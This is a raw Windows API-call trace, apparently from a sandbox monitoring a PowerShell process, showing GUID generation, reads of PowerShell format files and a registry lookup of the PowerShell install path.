	[0759.713] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x36c5d896, Data2=0xe387, Data3=0x49b5, Data4=([0]=0x93, [1]=0xed, [2]=0xee, [3]=0x3f, [4]=0x66, [5]=0xb, [6]=0xf1, [7]=0x59))) returned 0x0
	[0759.714] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xd4f2a181, Data2=0xb710, Data3=0x4081, Data4=([0]=0xa7, [1]=0xb, [2]=0xaf, [3]=0xae, [4]=0xbb, [5]=0xc8, [6]=0x92, [7]=0x22))) returned 0x0
	[0759.714] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xe3e13f8f, Data2=0xb009, Data3=0x4afd, Data4=([0]=0xae, [1]=0x7d, [2]=0x6d, [3]=0xa9, [4]=0xb4, [5]=0x90, [6]=0x4d, [7]=0x14))) returned 0x0
	[0759.714] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x1ad031e5, Data2=0xfc73, Data3=0x4dfd, Data4=([0]=0xaa, [1]=0x98, [2]=0x49, [3]=0xca, [4]=0x86, [5]=0xce, [6]=0x6b, [7]=0x75))) returned 0x0
	[0759.714] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x54ef92c2, Data2=0xc56a, Data3=0x46a7, Data4=([0]=0xb7, [1]=0x5, [2]=0x6b, [3]=0xd3, [4]=0x84, [5]=0xee, [6]=0xe9, [7]=0x22))) returned 0x0
	[0759.714] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x636f7825, Data2=0x2802, Data3=0x4963, Data4=([0]=0x9d, [1]=0xf6, [2]=0x6e, [3]=0xa, [4]=0xd0, [5]=0x98, [6]=0xfc, [7]=0xa2))) returned 0x0
	[0759.715] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x8d46a3ba, Data2=0xcd11, Data3=0x409e, Data4=([0]=0xa7, [1]=0x8, [2]=0x15, [3]=0xc8, [4]=0xf5, [5]=0x69, [6]=0xbb, [7]=0xd2))) returned 0x0
	[0759.715] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xc705263f, Data2=0x153a, Data3=0x4cc1, Data4=([0]=0x9f, [1]=0x6d, [2]=0xc, [3]=0xa, [4]=0xf6, [5]=0x41, [6]=0xc0, [7]=0xcd))) returned 0x0
	[0759.715] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x99483af3, Data2=0x40b6, Data3=0x40ab, Data4=([0]=0x91, [1]=0x20, [2]=0xef, [3]=0xe5, [4]=0x2, [5]=0x13, [6]=0x23, [7]=0x9a))) returned 0x0
	[0759.715] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x5c0222b8, Data2=0xc6dd, Data3=0x4c8f, Data4=([0]=0x91, [1]=0x9, [2]=0xaa, [3]=0xbc, [4]=0xe9, [5]=0x24, [6]=0x59, [7]=0x45))) returned 0x0
	[0759.716] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xed2680f7, Data2=0xc049, Data3=0x4c7d, Data4=([0]=0x8d, [1]=0x87, [2]=0x7a, [3]=0x9e, [4]=0x4e, [5]=0x35, [6]=0xee, [7]=0x82))) returned 0x0
	[0759.716] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xa9c7f148, Data2=0x5e29, Data3=0x449a, Data4=([0]=0x85, [1]=0xaa, [2]=0x78, [3]=0x84, [4]=0x6b, [5]=0xf, [6]=0xa1, [7]=0x76))) returned 0x0
	[0759.716] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xe42b26db, Data2=0x9ec5, Data3=0x46ed, Data4=([0]=0x88, [1]=0x47, [2]=0xc2, [3]=0xcd, [4]=0xdc, [5]=0xf3, [6]=0xb, [7]=0xb0))) returned 0x0
	[0759.717] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xc6c7400f, Data2=0xb8fc, Data3=0x4ef0, Data4=([0]=0xa2, [1]=0x40, [2]=0x2d, [3]=0x95, [4]=0xa, [5]=0x4f, [6]=0xd, [7]=0x2a))) returned 0x0
	[0759.717] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x35e2c9ed, Data2=0x934e, Data3=0x4052, Data4=([0]=0x8e, [1]=0xb7, [2]=0x55, [3]=0x2f, [4]=0x42, [5]=0xa9, [6]=0x38, [7]=0x6c))) returned 0x0
	[0759.717] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x4165da33, Data2=0x3a3, Data3=0x44a1, Data4=([0]=0xb5, [1]=0x57, [2]=0x4d, [3]=0x9c, [4]=0x85, [5]=0x9b, [6]=0xf9, [7]=0x60))) returned 0x0
	[0759.717] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xad2ffb71, Data2=0x94cd, Data3=0x4813, Data4=([0]=0xab, [1]=0x64, [2]=0x7, [3]=0x66, [4]=0x59, [5]=0x96, [6]=0xd9, [7]=0x26))) returned 0x0
	[0759.718] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x870ac255, Data2=0x9b1e, Data3=0x444c, Data4=([0]=0xa5, [1]=0x15, [2]=0xf2, [3]=0x94, [4]=0xc9, [5]=0x77, [6]=0x4c, [7]=0x61))) returned 0x0
	[0759.718] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x4f1c511d, Data2=0xa603, Data3=0x448b, Data4=([0]=0x84, [1]=0xc6, [2]=0x39, [3]=0xaa, [4]=0x1d, [5]=0xb5, [6]=0x5, [7]=0x2f))) returned 0x0
	[0759.718] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x3113ba9, Data2=0x425f, Data3=0x447c, Data4=([0]=0x81, [1]=0x23, [2]=0xd, [3]=0x5d, [4]=0x72, [5]=0xf4, [6]=0xc4, [7]=0x5c))) returned 0x0
	[0759.718] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x658eca48, Data2=0x5391, Data3=0x4f65, Data4=([0]=0x80, [1]=0xd8, [2]=0x50, [3]=0x99, [4]=0x89, [5]=0x43, [6]=0xad, [7]=0x5f))) returned 0x0
	[0759.719] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x1a825774, Data2=0x6f10, Data3=0x451f, Data4=([0]=0x96, [1]=0x95, [2]=0x8e, [3]=0x63, [4]=0xf2, [5]=0xa9, [6]=0xff, [7]=0x39))) returned 0x0
	[0759.719] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x2d7d8d37, Data2=0x8ec7, Data3=0x456e, Data4=([0]=0x88, [1]=0x78, [2]=0x8d, [3]=0x8b, [4]=0x35, [5]=0x1d, [6]=0x97, [7]=0xd7))) returned 0x0
	[0759.719] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x6275e5ca, Data2=0x49b4, Data3=0x4f61, Data4=([0]=0xbb, [1]=0xb4, [2]=0xb6, [3]=0x90, [4]=0xb9, [5]=0xba, [6]=0x3b, [7]=0x38))) returned 0x0
	[0759.719] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x3c435890, Data2=0x16c1, Data3=0x4f59, Data4=([0]=0x84, [1]=0x9b, [2]=0x8e, [3]=0x30, [4]=0x80, [5]=0x93, [6]=0x38, [7]=0x5f))) returned 0x0
	[0759.720] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x443eba76, Data2=0xcd5e, Data3=0x4844, Data4=([0]=0x9c, [1]=0x1c, [2]=0xeb, [3]=0xd4, [4]=0xde, [5]=0xd1, [6]=0x38, [7]=0xe3))) returned 0x0
	[0759.720] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x38764472, Data2=0xd0bc, Data3=0x45ab, Data4=([0]=0x8a, [1]=0x63, [2]=0x39, [3]=0xcb, [4]=0x32, [5]=0xe0, [6]=0x6d, [7]=0x5b))) returned 0x0
	[0759.720] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xc8d11ee0, Data2=0x4acc, Data3=0x4542, Data4=([0]=0xbc, [1]=0xe8, [2]=0x3f, [3]=0x3, [4]=0xc1, [5]=0x33, [6]=0xf4, [7]=0x8d))) returned 0x0
	[0759.720] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x13976d52, Data2=0x97eb, Data3=0x4cd9, Data4=([0]=0x86, [1]=0xba, [2]=0x7c, [3]=0x92, [4]=0x54, [5]=0x2f, [6]=0xd9, [7]=0xa1))) returned 0x0
	[0759.721] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xe0d040e, Data2=0x1a33, Data3=0x451b, Data4=([0]=0x91, [1]=0xdb, [2]=0x4a, [3]=0x80, [4]=0xca, [5]=0x45, [6]=0x22, [7]=0x8d))) returned 0x0
	[0761.053] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x24077003, Data2=0x2c90, Data3=0x41e1, Data4=([0]=0xa3, [1]=0xde, [2]=0x95, [3]=0x8, [4]=0x30, [5]=0x52, [6]=0xac, [7]=0x7a))) returned 0x0
	[0761.054] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0761.054] GetFileType (hFile=0x314) returned 0x1
	[0761.054] SetErrorMode (uMode=0x1) returned 0x1
	[0761.054] GetFileType (hFile=0x314) returned 0x1
	[0761.055] ReadFile (in: hFile=0x314, lpBuffer=0x34b1910, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x34b1910*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.064] ReadFile (in: hFile=0x314, lpBuffer=0x32ec500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32ec500*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.064] ReadFile (in: hFile=0x314, lpBuffer=0x32ec500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32ec500*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.065] ReadFile (in: hFile=0x314, lpBuffer=0x32ec500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32ec500*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.065] ReadFile (in: hFile=0x314, lpBuffer=0x32ec500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32ec500*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.065] ReadFile (in: hFile=0x314, lpBuffer=0x32ec500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32ec500*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.065] ReadFile (in: hFile=0x314, lpBuffer=0x32ec500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32ec500*, lpNumberOfBytesRead=0x14cd18*=0x119, lpOverlapped=0x0) returned 1
	[0761.065] ReadFile (in: hFile=0x314, lpBuffer=0x32ec500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32ec500*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0761.066] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cda8 | out: phkResult=0x14cda8*=0x314) returned 0x0
	[0761.066] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cd2c, lpData=0x0, lpcbData=0x14cd28*=0x0 | out: lpType=0x14cd2c*=0x1, lpData=0x0, lpcbData=0x14cd28*=0x56) returned 0x0
	[0761.066] CoTaskMemAlloc (cb=0x5a) returned 0x1b73d620
	[0761.066] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ccfc, lpData=0x1b73d620, lpcbData=0x14ccf8*=0x56 | out: lpType=0x14ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ccf8*=0x56) returned 0x0
	[0761.066] CoTaskMemFree (pv=0x1b73d620) 
	[0761.066] RegCloseKey (hKey=0x314) returned 0x0
	[0761.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0761.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0761.067] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x50931337, Data2=0xa4b, Data3=0x4631, Data4=([0]=0xa5, [1]=0xff, [2]=0x70, [3]=0x7a, [4]=0xb9, [5]=0x36, [6]=0x4, [7]=0x90))) returned 0x0
	[0761.067] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x92c5016, Data2=0x4d77, Data3=0x4ff3, Data4=([0]=0x81, [1]=0x70, [2]=0xd, [3]=0xb2, [4]=0x53, [5]=0x54, [6]=0x99, [7]=0x41))) returned 0x0
	[0761.067] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x720e3d56, Data2=0x23ab, Data3=0x4d2d, Data4=([0]=0xbf, [1]=0xd0, [2]=0x4f, [3]=0xb8, [4]=0x63, [5]=0x10, [6]=0x15, [7]=0x42))) returned 0x0
	[0761.067] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xa381bd25, Data2=0xb80c, Data3=0x4c1a, Data4=([0]=0xb7, [1]=0x73, [2]=0x1f, [3]=0x81, [4]=0x1, [5]=0x4c, [6]=0xb, [7]=0x34))) returned 0x0
	[0761.068] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0761.068] GetFileType (hFile=0x314) returned 0x1
	[0761.068] SetErrorMode (uMode=0x1) returned 0x1
	[0761.068] GetFileType (hFile=0x314) returned 0x1
	[0761.068] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.068] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.068] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.069] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.069] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.069] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.069] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.069] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.071] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.072] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.072] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.072] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.073] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.073] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.073] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.074] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.077] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.078] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.078] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.078] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.079] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.079] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.079] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.080] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.080] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.080] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.081] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.081] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.081] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.082] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.082] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0761.083] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.349] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.350] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.350] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.350] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.351] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.351] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.351] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.352] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.352] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.352] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.353] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.353] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.354] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.354] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
